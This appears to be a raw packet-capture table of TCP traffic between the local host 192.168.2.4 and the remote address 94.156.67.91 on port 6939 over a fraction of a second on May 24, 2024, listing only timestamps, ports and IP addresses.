May 24, 2024 05:09:49.391437054 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.391458988 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.391489029 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.391987085 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.392003059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.392010927 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.392023087 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.392030954 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.392043114 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.392059088 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.392792940 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.392838001 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.393055916 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.393064976 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.393073082 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.393110037 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.396936893 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.396984100 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.397044897 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.397259951 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.397382021 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.397532940 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.397732019 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.397739887 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.397747993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.397770882 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.397789955 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.398166895 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.399204016 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.399255037 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.399307966 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.399518967 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.399528980 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.399554968 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.399612904 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.399652004 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.399822950 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.399832010 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.399873018 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.403081894 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.404201031 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.404243946 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.404274940 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.404475927 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.404484987 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.404599905 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.404644966 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.404654980 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.404689074 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.404957056 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.404999971 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.407855988 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.408683062 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.408727884 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.408777952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.408960104 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.408970118 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.409085989 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.409147978 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.409157038 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.409166098 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.409188986 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.409208059 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.412623882 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.413852930 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.413903952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.413903952 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.414069891 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.414117098 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.414231062 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.414351940 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.414371967 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.414381981 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.414402008 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.414434910 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.417362928 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.422580004 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.422702074 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.422772884 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.422894001 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.422944069 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.423105001 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.423336983 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.423345089 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.423352003 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.423392057 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.423392057 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.426703930 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.426831007 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.426841021 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.426884890 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.427016020 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.427067041 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.427254915 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.427263975 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.427270889 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.427278042 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.427303076 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.427330017 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.427862883 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.434252977 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.434417009 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.434551001 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.434561014 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.434660912 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.434670925 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.434755087 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.434755087 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.434828043 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.434838057 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.434894085 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.437902927 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.437916040 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.437963009 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.438080072 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.438178062 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.438188076 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.438338995 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.438344002 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.438355923 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.438414097 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.438668013 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.438718081 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.439007998 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.441634893 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.441692114 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.441723108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.441899061 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.442055941 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.442065954 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.442075968 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.442127943 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.442225933 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.442234993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.442290068 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.443770885 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.468184948 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.468274117 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.468286037 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.468483925 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.468492985 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.468549967 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.468900919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.468913078 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.468957901 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.473011017 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.473068953 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.475991964 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.476062059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.476216078 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.476281881 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.476290941 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.476403952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.476412058 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.476418972 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.476502895 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.476502895 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.476922989 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.476946115 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.476983070 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.477085114 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.477127075 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.477232933 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.477431059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.477438927 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.477446079 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.477452993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.477468967 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.477498055 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.477933884 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.477942944 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.477977991 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.478107929 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.478152037 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.478223085 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.478266954 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.478275061 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.478307962 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.478770018 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.478779078 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.478816986 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.479114056 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.479123116 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.479129076 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.479165077 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.479165077 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.479448080 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.479456902 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.479470968 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.479511976 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.479918957 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.479931116 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.479996920 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.480092049 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.480144024 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.480282068 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.480292082 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.480299950 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.480308056 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.480334044 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.480360985 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.480751991 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.480916977 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.480971098 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.485979080 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.486174107 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.486215115 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.486216068 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.486227036 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.486234903 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.486280918 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.486562967 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.486572027 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.486624956 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.488137007 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.488192081 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.488198996 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.488199949 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.488260984 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.488384008 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.488554001 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.488591909 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.488763094 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.488770962 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.488804102 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.490688086 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.490696907 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.490739107 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.493125916 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.493160963 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.493205070 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.493338108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.493460894 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.493562937 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.493588924 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.493597984 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.493607998 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.493628979 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.495450974 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.495497942 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.497627020 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.497767925 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.497818947 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.497823000 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.497997046 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.498006105 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.498009920 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.498013973 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.498184919 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.500236988 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.500283957 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.502629995 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.502697945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.502737045 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.502825022 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.503022909 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.503032923 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.503139019 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.503148079 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.503151894 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.503192902 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.504995108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.505043983 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.511414051 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.511497974 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.511567116 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.511657000 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.511868000 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.511878014 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.511887074 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.511894941 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.511909008 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.511928082 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.515582085 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.515717983 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.515728951 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.515737057 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.515779018 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.515837908 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.515847921 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.515857935 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.515866995 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.515974998 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.515974998 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.516294003 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.516473055 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.516518116 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.523138046 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.523286104 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.523345947 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.523385048 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.523649931 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.523660898 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.523670912 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.523679972 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.523704052 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.523737907 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.526770115 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.526823044 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.526861906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.526874065 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.526918888 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.527014017 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.527192116 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.527245045 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.527395010 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.527405977 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.527414083 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.527455091 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.527894020 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.527952909 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.530399084 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.530553102 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.530608892 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.530644894 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.530772924 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.530781984 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.530880928 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.530940056 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.530940056 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.531023979 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.532596111 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.532651901 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.557157040 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.557166100 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.557322979 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.557389021 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.557471037 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.557480097 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.557488918 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.557498932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.557643890 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.557645082 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.561979055 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.562093019 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.565046072 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.565218925 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.565233946 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.565387964 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.565404892 CEST	6939	49737	94.156.67.91	192.168.2.4
